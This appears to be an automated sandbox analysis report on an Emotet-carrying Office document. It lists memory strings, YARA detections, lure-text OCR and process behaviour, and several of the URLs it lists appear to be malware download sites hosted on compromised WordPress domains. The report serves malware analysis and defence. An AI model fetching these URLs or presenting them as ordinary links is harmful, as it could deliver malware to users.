                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000005.00000002.2103563563.000000001CC40000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                      Source: powershell.exe, 00000005.00000002.2103414288.000000001B4C5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0J
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0/
                      Source: powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                      Source: powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                      Source: powershell.exe, 00000005.00000002.2096093132.0000000002450000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100938430.0000000002970000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2104214034.000000001D220000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2096093132.0000000002450000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100938430.0000000002970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                      Source: powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://www.certicamara.com0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                      Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                      Source: powershell.exe, 00000005.00000003.2094894681.000000001CCAE000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                      Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                      Source: powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                      Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                      Source: powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                      Source: powershell.exe, 00000005.00000003.2095113517.000000001CC9A000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                      Source: powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                      Source: powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                      Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                      Source: powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                      Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                      Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                      Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                      Source: powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                      Source: rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                      Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                      Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomsta
                      Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
                      Source: powershell.exe, 00000005.00000002.2096708382.0000000002C54000.00000004.00000001.sdmpString found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/P
                      Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: powershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                      Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev
                      Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmpString found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
                      Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: https://traumfrauen-ukraine.de
                      Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                      Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                      Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                      Source: powershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                      Source: powershell.exe, 00000005.00000002.2095523344.00000000001FF000.00000004.00000020.sdmpString found in binary or memory: https://www.netlock.net/docs
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2340431791.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2098274054.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2098491144.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2099699413.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2099787723.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2103402652.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2340448062.0000000000330000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.330000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.890000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.890000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.330000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,362 N@m 13 ;a 10096 G) FI G) ,,
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,362 N@m 13 ;a 10096 G) FI G) ,, . [:D:] ,,gS ..,
                      Source: Document image extraction number: 0Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 0Screenshot OCR: Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Editing and Enable Content.
                      Source: Document image extraction number: 1Screenshot OCR: Enable Content.
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5413
                      Source: unknownProcess created: Commandline size = 5312
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5312
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ueilekrvmxoa\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00240223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00248A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00240672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00245250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00241090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00244F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00243F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00249B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0024135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00242FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002493AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002447B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023FFBA
